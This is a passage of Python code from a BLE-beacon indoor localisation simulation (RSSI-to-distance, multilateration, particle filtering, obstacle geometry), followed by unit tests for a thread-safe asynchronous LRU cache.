receiverPositionsArray=np.array(self.receiverPositions)
##print "elements are : " + str( elements )
#resultingPoint = Trilaterate(rp1.coord,elements[0],rp2.coord,elements[1],rp3.coord,elements[2])
#resultingPoint = minimize_dist_error(elements,np.vstack(coordinates ),xdims,ydims )
#with open('deneme.txt', 'a') as the_file:
# the_file.write("beacon_pos is: " + str(self.beacon_pos) + "\n" )
#print "beacon_pos is: " + str(self.beacon_pos)
# if checkForBlocks == True, it also considers blocks for minimization in the disadvantage of time consumption
# checkForBlocks means include None info to make multi lateration calculations
resultingPoint = custom_minimize(self.RSSIofReceivers,np.vstack(receiverPositionsArray ),xdims,ydims,sensitivityOfResult,checkForBlocks=True )
return resultingPoint
def calc_PDF(self,strongSignalDistance,pastCoeff):
numberOfNotNones=0
numberOfStrongSignals=0
confidenceEllipseMultiplier=1
for distToReceiver in self.distToReceivers:
if distToReceiver is not None:
numberOfNotNones+=1
#print "dist to receiver is: " + str(distToReceiver)
if distToReceiver < strongSignalDistance:
numberOfStrongSignals+=1
"""returns mu and variance of the weighted particles"""
self.mu = np.average(self.particles, weights=self.weights, axis=0)
#var = np.average((particles - mu)**2, weights=weights, axis=0)
self.covMatrix = np.cov(m=self.particles, rowvar=False, aweights=self.weights) # rowvar has to be False otherwise each row represents a variable, with observations in the columns.
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.cov.html
self.max_weighted_particle = self.particles[np.argmax(self.weights) ]
if numberOfNotNones >=3:
if numberOfStrongSignals >= 3:
confidenceEllipseMultiplier=1 # No change
elif numberOfStrongSignals == 2:
confidenceEllipseMultiplier=1.25
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=1.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=2
# x1.6 worse than the >=3 case
elif numberOfNotNones == 2:
if numberOfStrongSignals == 2:
confidenceEllipseMultiplier=2
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=2.4
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=3.2
# x3 worse than the >=3 case
elif numberOfNotNones == 1:
if numberOfStrongSignals == 1:
confidenceEllipseMultiplier=4.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=6.0
# x5 worse than the >=3 case
else: # numberOfNotNones == 0:
#confidenceEllipseMultiplier=float("inf") # boyle olunca hic cizmesin ellipse
confidenceEllipseMultiplier=10.0 # 10.0 max'imiz olsun mesela
self.covMatrix*=confidenceEllipseMultiplier
# if pastCoeff == 1, o zaman ilk tur harici covMatrix hep prev'e esit olacak. Yani ilk turda buldugu covariance hep esas algidi olmus olacak
if self.prevCovMatrix is not None:
self.covMatrix=self.covMatrix*(1-pastCoeff) + pastCoeff*self.prevCovMatrix
# circle center, circle radius, 2 ends of line segment
def findEllipseLineSegmentIntersectionPoints(ellipseCenter,width,height, p1,p2):
if ( np.array_equal(p1,p2) ):
return None
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
line = LineString([p1,p2])
if ellipse.intersects(line):
intersectionPointObject = ellipse.intersection(line)
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
#print "ellipse line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def checkFirstRectangleContainsSecondRectangle(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.contains(rectangle2)
def checkRectangleRectangleIntersection(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.intersects(rectangle2)
# circle center, circle radius, 2 ends of line segment
def checkEllipseRectangleIntersection(ellipseCenter,width,height, rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
#print "bottomLeftCorner is: " + str(bottomLeftCorner)
#print "topRightCorner is: " + str(topRightCorner)
#print "room position is " + str(rectCenter)
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return ellipse.intersects(rectangle)
def checkPointInsideRectangle(point,rectCenter,rectWidth,rectLength,boundaryForRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
point = Point(point)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return point.intersects(rectangle)
# if line intersects the rectangle only at 1 point(which could be the rectangle's corner, then we can return None since there is almost no intersection)
# it may intersect at infinite points for points in the same line with an edge(but since it only)
# bunun disinda x,y kontrolu yaparken odanin icinde hic olma ihtimallerini dusurecek cunku oda icindeki point'ler hep kesiiyor olacak ne kadar kalinligi varsa artik
# aslinda odanin icine girme mevzusunu bu handle etmiyor(cunku odanin icine giremiyor benim yesil beacon'im ama girebilse intersection kontrolu oda icerisinde olmamali)
# aslidna line segment yani x,y oda icerisinde ise hic kabul etmemeli bu x,y'i(simulasyon geregi burada olamaz ama simdilik odalara girilmiyor diye kabul ediyorum)
# simdilik oda icerisindeki noktalar az da olsa cezalandiriliyor boyle kalsin artik cok yakinlasamayacagimiz icin zaten buradaki noktalarin sansi dusuk
# sonsuz intersection ve tekli intersecitno'lari engellesek yeter simdilik
# aslinda contains de sonsuz noktada kesiiyor demek, demek ki sonsuz nokta kesisiminde line'in kesisen ilk ve son noktalarini veriyor
# belki de rectangle'in icini bos kabul ediyor, odanin icerisindekileri de hic cezalandirmiyoruz bilemiyorum
def findRectangleLineSegmentIntersectionPoints(p1,p2,rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
if np.array_equal(p1,p2):
return None
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
line = LineString([p1,p2])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
#print "findRectangleLineSegmentIntersectionPoints"
if rectangle.intersects(line):
intersectionPointObject = rectangle.intersection(line)
#print intersectionPointObject.coords[0]
#print intersectionPointObject.coords[1]
#print np.array(intersectionPointObject.coords).shape
if np.array_equal(np.array(intersectionPointObject.coords).shape,np.array([2, 2])):
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
#print "rectangle line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def generateRandomMACID():
return ':'.join('%02x'%np.random.randint(0,256) for _ in range(6))
# zayiflamasina ragmen bir istasyona gelen sinyal guclu ise, bu sinyal diger zayif sinyallerden daha degerli
# bu yukaridazden distToReceivers degeri kucuk olan bir sinyal bizim icin daha cok anlama ifade ediyor
# bu degeri kucuk olan istedigimiz icin bu deger ile carparsam o sum daha kucuk olur, bizim istedigimizi elde ihtimalimiz artar
# multilateratiion icin check edecegimiz [x,y] noktasi, eger ble fingerprinting result'taki ile +-2dBm'den fark ediyorsa cezalandir. Bu noktalarin olma ihtimali daha az cunku
def custom_minimize(RSSIofReceivers, receiverPositions,xdims,ydims,sensitivityOfResult=1.0,checkForBlocks=True):
mysum=float("inf")
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal ) + safetyOffset
#print "maxCatchableSignalDistance is: " + str(maxCatchableSignalDistance)
resultingPoint=[-1,-1]
for x in np.arange(xdims[0],xdims[1],sensitivityOfResult):
for y in np.arange(ydims[0],ydims[1],sensitivityOfResult):
# if x,y collides with a block or room, this position would not be possible
isPointOnObstacle=False
for blockPosition in blockPositions: # it will not enter this loop if there are no blocks
if checkPointInsideRectangle([x,y],blockPosition,blockWidth,blockLength):
isPointOnObstacle=True
break
if not isPointOnObstacle:
for roomIndex,roomPosition in enumerate(roomPositions):
if checkPointInsideRectangle([x,y],roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
isPointOnObstacle=True
break
if isPointOnObstacle:
continue # this point cannot be what we are looking for
tmp_sum=0
for i in range(len(receiverPositions)):
strengtheningAmount=0
for blockIndex, blockPosition in enumerate(blockPositions): # it will not enter this loop if there are no blocks
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
# when tryin all possible x and y, this x and y should not be equal to the receivers position, since it would not be a line
# if it is equal to the receivers position, the intersection should return None
# so findRectangleLineSegmentIntersectionPoints function should return None if points to make the lines are equal
# also if intersection is at a corner(which means intersect only at 1 point, then it should return None for this case as well since intersection dist would be zero already)
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),roomPosition,roomWidth[roomIndex],roomLength[roomIndex])
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
xyDistToRec = np.linalg.norm( [x,y] - receiverPositions[i] )
if RSSIofReceivers[i] is not None:
distToReceiverGivenRSSI=RSSI_to_distance( RSSIofReceivers[i] + strengtheningAmount) + safetyOffset
tmp_sum+=( abs( xyDistToRec - distToReceiverGivenRSSI ) / distToReceiverGivenRSSI ) ** 2
# eger 5 turdur arka arkaya None ise yapsin hemen None ise degil -> zaten sinyalleri buraya gondermeden ona gore ayarliyorum
else: # distToReceivers[i] None ise, [x,y]'intersection receiver'imiza belli yakinliktan fazla yakin olmasi imkansiz olmali(bundan daha yakin ise cezalandir)
# [x,y], receiverPositions[i]'ye ne kadar yakinda o kadar cezalandir
# distToReceivers[i] bizim belirledigimiz bir sey zaten tahminimiz yani. Biz bunun yerine mesela 10m koyabiliriz bundan ne kdar deviate etmis diye
# ama bizim icin ne kadar yakinda o kadar kotu cunku biz belirli bir uzaklik tahmin ediyoruz, o yuzden 1/distToReceivers yerine 1/ ( [x,y]-receiverPositons) koyalim
#if checkForBlocks:
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal + strengtheningAmount) + safetyOffset
if xyDistToRec < maxCatchableSignalDistance: # we see it as None, so it should not be closer than maxCatchableSignalDistance. If so, then punish
tmp_sum+=( abs( xyDistToRec - maxCatchableSignalDistance ) / xyDistToRec ) ** 2
if tmp_sum < mysum:
mysum = tmp_sum
resultingPoint=[x,y]
return resultingPoint
# after signal transmitted, maybe the signal hit a wall and reduced in strength/
# since we cannot manipulate after transmittion is node, we reduce the signal when transmitting assuming it will hit something by a posibility
# We have to increase it by a possibility
def weakenedSignal(RSSI,maxSignalError):
return RSSI - uniform(0,maxSignalError)
def create_uniform_particles(x_range, y_range, NumberOfParticles):
particles = np.empty((NumberOfParticles, 2))
particles[:, 0] = uniform(x_range[0], x_range[1], size=NumberOfParticles)
particles[:, 1] = uniform(y_range[0], y_range[1], size=NumberOfParticles)
return particles
# for each receiver hold a separate signal strenght map
# each beacon should have its interpolation all around the map. Then we we should take weighted average of these beacons signal strengths values
# For example, FOR RECEIVER 1, if beacon1 is at [5,5] and beacon2 is at [10,3] and the point that we want to interpolate is at [10,5]. Beacon2 should have higher vote to determine signal strength
# signal strength values of the beacons (fingerpritn positions) are different for each receiver, therefore for each receiver we should hold another map info
def interpolateFingerPrintingResult():
xElems=np.arange(xdims[0],xdims[1],sensitivityOfResult)
yElems=np.arange(ydims[0],ydims[1],sensitivityOfResult )
allPosDistancesToReceivers={} # make it a dictionary where the key is 2d position
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
allPosDistancesToReceivers[i,x,y]=np.linalg.norm(receiverPositions[i]- [x,y])
numberOfBeacons=fingerPrintingSignalStrengthBeaconsToReceivers.shape[1]
allPosDistancesToBeacons={} # make it a dictionary where the key is 2d position
for k in range(numberOfBeacons):
for x in xElems:
for y in yElems:
allPosDistancesToBeacons[k,x,y]=np.linalg.norm(fingerPrintingBeaconPositions[k]- [x,y])
# INITIALIZE INTERPOLATION MAP FOR EACH RECEIVER
global interpolatedSignalStrenghForAllPositions_forEachReceiver
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]=0
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
minDist=np.float('inf')
min_k=0
# find the closest beacon to [x,y]
for k in range(numberOfBeacons):
if allPosDistancesToBeacons[k,x,y] < minDist:
min_k=k
minDist = allPosDistancesToBeacons[k,x,y]
base_dist=np.linalg.norm(fingerPrintingBeaconPositions[min_k]-receiverPositions[i])
target_dist=allPosDistancesToReceivers[i,x,y]
base_RSSI=fingerPrintingSignalStrengthBeaconsToReceivers[i][min_k]
# whichever beacon or receiver is the closest to [x,y], it should determine the interpolation result
# yada receiver'lar daha yakin ise o noktalara 0 olarak vs. kalsin
# en sonra da buradaki tahmini degerleri hic bir blok yokmuscasina receiver versin
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]+=calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print interpolatedSignalStrenghForAllPositions_forEachReceiver
def calc_relative_RSSI(base_dist, target_dist, base_RSSI):
if target_dist >= 1:
return base_RSSI + -20 * np.log ( (target_dist) / (base_dist+safetyOffset) )
else:
return zero_one_meter_distance_to_RSSI(target_dist)
#distance in meters, returns RSSI in dBm
# assuming signal propogation constant is 2, https://www.rn.inf.tu-dresden.de/dargie/papers/icwcuca.pdf in equation (4)
# distance 4'den 8'e cikinca 0.6'dan 0.9'a cikiyor(negative ile carpildigi icin output), output daha az azalmis oluyro dist arttikca
# zero_one_meter_distance_to_RSSI'te ise mesela dist 0.1'den 0.2'ye ciksa sonuc 0.15'en 0.34'e cikiyor -> yani rssi daha hizli azalmis oluyor
def distance_to_RSSI(distance):
res_RSSI = 0
##print "distance is: " + str(distance)
if distance >=1:
res_RSSI = -20 * np.log10(distance) + rssiAtOne
else:
res_RSSI = zero_one_meter_distance_to_RSSI(distance)
return float(res_RSSI)
#RSSI in dBm, returns distance in meter
def RSSI_to_distance(RSSI):
res_distance = 0
if RSSI <= rssiAtOne:
res_distance = 10**( (RSSI-rssiAtOne) / -20 )
else:
res_distance = zero_one_meter_RSSI_to_distance(RSSI)
return float(res_distance)
# EXPONENTIAL FUNCITON BETWEEN 0 and 1
def zero_one_meter_RSSI_to_distance(RSSI):
#return float( np.log( (np.e - 1)/rssiAtOne * RSSI + 1 ) )
return 10**( ( ( RSSI - TX_Power ) * np.log10(2) ) / (rssiAtOne - TX_Power) ) -1
# should return something between TX power and rssiAtOne
def zero_one_meter_distance_to_RSSI (dist):
#return float( rssiAtOne * ( (np.exp(dist) - 1) / (np.e - 1) ) )
return float( TX_Power + (rssiAtOne - TX_Power) * ( (np.log10(dist+1)) / (np.log10(2) ) ) )
#float( (1-dist)*TX_Power + dist*rssiAtOne
# N_eff : Effective weight number
def neff(weights):
return 1.0 / np.sum(np.square(weights))
def getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#reaOfTheMap=int( (ymax-ymin)*(xmax-xmin) )
step_size=(1/( np.ceil(np.sqrt(numberOfReceivers*1000) ) ) )
while True:
#initial_points=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(areaOfTheMap*2,2)) # I deleted .tolist()
#x_step_size=(xdims[1]-xdims[0])/3
#y_step_size=(ydims[1]-ydims[0])/3
#print "step_size is: " + str(step_size)
initial_points = np.mgrid[0:1+step_size:step_size, 0:1+step_size:step_size].reshape(2,-1).T
receiverPositions = KMeans(n_clusters=numberOfReceivers, random_state=0,n_init=100).fit(initial_points).cluster_centers_
#receiverPositions=kmeans(initial_points,numberOfReceivers)
if receiverPositions is not None:
##print "initial receiver positions area " + str(receiverPositions)
receiverPositions[:,0]=xmin+receiverPositions[:,0]*(xmax-xmin)
receiverPositions[:,1]=ymin+receiverPositions[:,1]*(ymax-ymin)
##print "after receiverPositions are " + str(receiverPositions)
return receiverPositions
#return initial_points
def getBlockPositionsToInstall(xdims,ydims,numberOfBlocks):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfBlocksCreated=0
blockPositionsToInstall=[]
while numberOfBlocksCreated!=numberOfBlocks:
blockCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
collisionExists=False
for receiverPosition in receiverPositions:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,receiverPosition,receiverWidth,receiverLength):
collisionExists=True
break
intersectionWithOtherBlocksExists=False
if not collisionExists: # if collision exists, do not make other checks
for blockPosition in blockPositionsToInstall:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,blockPosition,blockWidth,blockLength):
intersectionWithOtherBlocksExists=True
break
if not collisionExists and not intersectionWithOtherBlocksExists:
blockPositionsToInstall.append(blockCoord)
numberOfBlocksCreated+=1
#print numberOfBlocksCreated
return np.array(blockPositionsToInstall)
def getRoomPositionsToInstall(xdims,ydims,numberOfRooms,roomBoundary):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfRoomsCreated=0
roomPositionsToInstall=[]
while numberOfRoomsCreated!=numberOfRooms:
roomCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
receiverHollowRoomCollisionExists=False
for receiverPosition in receiverPositions:
if not checkFirstRectangleContainsSecondRectangle(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=-roomBoundary) and \
checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=roomBoundary):
receiverHollowRoomCollisionExists=True
break
intersectionWithBlocksExists=False
if not receiverHollowRoomCollisionExists:
for blockPosition in blockPositions:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,blockPosition,blockWidth,blockLength,boundaryForFirstRect=roomBoundary):
intersectionWithBlocksExists=True
break
intersectionWithOtherRoomsExists=False
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists:
for roomPosition in roomPositionsToInstall:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,roomPosition,roomWidth,roomLength,boundaryForFirstRect=roomBoundary,boundaryForSecondRect=roomBoundary):
intersectionWithOtherRoomsExists=True
break
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists and not intersectionWithOtherRoomsExists:
roomPositionsToInstall.append(roomCoord)
numberOfRoomsCreated+=1
#print numberOfRoomsCreated
return np.array(roomPositionsToInstall)
# main function
# strongSignalDistance -> to how many meters we accept this signal as strong. We use it for confidence ellipse calculations
# sensitivityOfResult -> how much sensitive we are about the final position of our object of interest
# maxSignalError -> signals are erronoues in real life, to simulate add noise upto this number
# minUsefulSignal -> min signal value we use for distance calculation
# minSignalValue -> min signal that we can still find, if a signal is lower than that(if receiver is far away), then this receiver(s) cannot catch this signal.
# movingLimit -> how many meters at a time our object moves at max
# movingTendency -> in what direction and meters our object tends to move
def animate_dummy_init():
pass
def animate(iterNo, macID, currPerson, NumberOfParticles, xdims=(0, 50), ydims=(0, 50), maxSignalError=20, movingLimit=2, pastCoeff=0, minUsefulSignal=-90,
minSignalValue=-100,numberOfReceivers=4, sensitivityOfResult=1.0, strongSignalDistance=5 , movingTendency=np.array([0,0]) ):
print "iterNo is: ", iterNo
currPerson.move_beacon_in_map(xdims,ydims,movingLimit,movingTendency,roomBoundary=roomWallWidth/2)
#currPerson.beacon_pos = predefinedPos[iterNo]
currPerson.calc_RSSIs_to_Receivers(minSignalValue,minUsefulSignal,maxSignalError )
currPerson.setBeaconDistances_fromRSSIs(minUsefulSignal)
global numberOfNotFounds
print iterNo
isProcessed=False
if all(dist is None for dist in currPerson.distToReceivers):
#print "all distances are None, no processing"
numberOfNotFounds+=1
pass
else:
currPerson.averaged_beacon_pos = currPerson.multiLateration(xdims,ydims,sensitivityOfResult)
#print "real pos is: " + str(currPerson.beacon_pos)
#print "multilateratiion pos is: " + str(currPerson.averaged_beacon_pos)
#print "averaged_beacon_pos for " + macID + " is: " + str(currPerson.averaged_beacon_pos)
#print "the real pos for " + macID + " is: " + str(currPerson.beacon_pos)
# 1st STEP
currPerson.predict_BLE(no_of_noise_elements = NumberOfParticles, movingLimit=movingLimit, pastCoeff = pastCoeff, xdims=xdims, ydims=ydims,movingTendency=movingTendency )
# 2nd STEP
currPerson.update_weights()
# resample if too few effective particles
if neff(currPerson.weights) < NumberOfParticles/2.0:
tmp_particles=np.zeros((NumberOfParticles, 2))
tmp_weights = np.zeros(NumberOfParticles)
tmp_particles[:]=currPerson.particles[:]
tmp_weights[:]=currPerson.weights[:]
currPerson.resample_from_higher_weights(tmp_particles, tmp_weights)
if np.allclose(tmp_weights, 1.0/NumberOfParticles):
currPerson.weights[:]=tmp_weights[:]
currPerson.particles[:]=tmp_particles[:]
else:
#print "no resampling is made for iteration " + iterNo
pass
currPerson.calc_PDF(strongSignalDistance,pastCoeff)
currPerson.prev_covMatrix=currPerson.covMatrix
currPerson.x_pp[:] = currPerson.x_prev[:] # or np.copyto(x_pp,x_prev)
currPerson.x_prev[:] = currPerson.particles[:] # or np.copyto(x_prev,particles)
global OverallError
CurrAccuracy = np.linalg.norm(currPerson.mu-currPerson.beacon_pos)
OverallError += CurrAccuracy
# https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib
particles_x,particles_y=np.hsplit(currPerson.particles,2)
if iterNo == totalIterNo-1:
#print "OverallError error is: " + str(OverallError)
#print "average Error is: " + str(OverallError/(totalIterNo-numberOfNotFounds) )
#print "numberOfNotFounds is: " + str(numberOfNotFounds)
with open(sys.argv[2]+"_avgError.txt","a+") as outFile:
if OverallError!=0:
outFile.write(str(OverallError/(totalIterNo-numberOfNotFounds) ) + "\n")
else:
outFile.write(str(OverallError) + "\n")
with open(sys.argv[2]+"_noSignalError.txt","a+") as outFile:
outFile.write(str(numberOfNotFounds) + "\n" )
#if isProcessed:
# ax.legend([beaconPosPlot, muPlot, maxWeightedPlot], ['BLE Beacon Pos', 'Mean Of Particles', 'Most Weighted Particle'], loc="lower left", prop={'size': 10}, bbox_to_anchor=(0, 1))
#else:
# ax.legend([beaconPosPlot], ['BLE Beacon Pos'], loc="lower left", prop={'size': 10}, bbox_to_anchor=(0, 1))
####################################################################################################################################################################################
if __name__ == '__main__':
main()
|
test_async_lrucache.py
|
import unittest
import threading
import time
from .async_lrucache import AsyncLRUCache
class AsyncLRUCacheTest(unittest.TestCase):
def test_multiple_gets(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
cache.get(0)
cache.get(0)
cache.get(0)
value = cache.get(0)
self.assertEqual(count, 1)
self.assertEqual(value, 0)
def test_multiple_retrieves_different_keys(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
def th(cache: AsyncLRUCache, key):
cache.get(key)
t = {}
for x in [1,2,3]:
t[x] = threading.Thread(target=th, args=(cache, x))
t[x].start()
time.sleep(0.15)
self.assertEqual(len(cache._lru._cache), 3)
self.assertEqual(count, 3)
def test_multiple_retrieves_same_keys(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
def th(cache: AsyncLRUCache, key):
cache.get(key)
t = {}
for x in range(50):
t[x] = threading.Thread(target=th, args=(cache, 1000000))
t[x].start()
time.sleep(0.15)
for x in range(50):
t[x] = threading.Thread(target=th, args=(cache, 1000000))
t[x].start()
self.assertEqual(len(cache._lru._cache), 1)
self.assertEqual(count, 1)
def test_inject(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
cache.inject(123, 123)
self.assertEqual(len(cache._lru._cache), 1)
def th(cache: AsyncLRUCache, key):
cache.get(key)
t = {}
for x in range(50):
t[x] = threading.Thread(target=th, args=(cache, 123))
t[x].start()
self.assertEqual(len(cache._lru._cache), 1)
self.assertEqual(count, 0)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.